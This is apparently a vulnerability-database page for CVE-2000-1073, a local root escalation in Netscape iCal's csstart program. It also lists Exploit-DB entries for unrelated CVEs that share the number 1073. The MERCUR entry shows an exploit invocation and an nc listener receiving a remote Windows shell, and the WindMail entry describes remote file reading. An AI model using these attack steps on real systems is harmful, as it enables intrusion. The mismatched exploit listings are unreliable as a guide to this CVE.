CVE-2000-1073
Published 2000-12-11
Priority: P4 | 19 | high
CVSS 2.0: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
EPSS: 0.49% (38.4th percentile)
csstart program in iCal 2.1 Patch 2 searches for the cshttpd program in the current working directory, which allows local users to gain root privileges by creating a Trojan Horse cshttpd program in a directory and calling csstart from that directory.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netscape | iplanet_ical | — | — |
No detection rules found.
Exploit-DB
3.3/4.0/4.2 MERCUR MailServer - Control-Service Buffer Overflow
exploitdb·2002-07-16
CVE-2002-1073 3.3/4.0/4.2 MERCUR MailServer - Control-Service Buffer Overflow
---
// source: https://www.securityfocus.com/bid/5261/info
// MERCUR Mailserver is prone to a remotely exploitable buffer overflow condition. The condition is due to insufficient bounds checking in the Control-Service component, which listens on TCP port 32000 by default. It is possible to corrupt process memory by supplying an overly long username/password. Attackers may exploit this condition to execute arbitrary instructions with the privileges of the mailserver.
/*
mercrexp.c (7/16/2002)
# ./mercrexp 192.168.0.2 32000 192.168.1.2 3333
# nc -l -p 3333
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\WINNT\system32>
Exploit-DB
GeoCel WindMail 3.0 - Remote File Read
exploitdb·2000-03-27
CVE-2000-0242 GeoCel WindMail 3.0 - Remote File Read
---
source: https://www.securityfocus.com/bid/1073/info
WindMail is a command-line mailer that can be integrated with perl cgi applications to create form-mail capability for a website.
WindMail 3.0 and possibly previous versions can be used to retrieve any ascii file that the webserver has read access to, provided the path and filename is known to the attacker. If the attacker has write access anywhere on the system and can determine the path to the writable directory, any file whether ascii or binary can be retrieved.
WindMail operates in two modes: "command line" and "header parsing".
In command line mode, all delivery options are specified at the command line as switch values, and the -n switch specifies a file name to send as the message bo
No writeups or analysis indexed.
http://www.atstake.com/research/advisories/2000/a100900-1.txt
http://www.osvdb.org/7210
http://www.securityfocus.com/bid/1769
https://exchange.xforce.ibmcloud.com/vulnerabilities/5757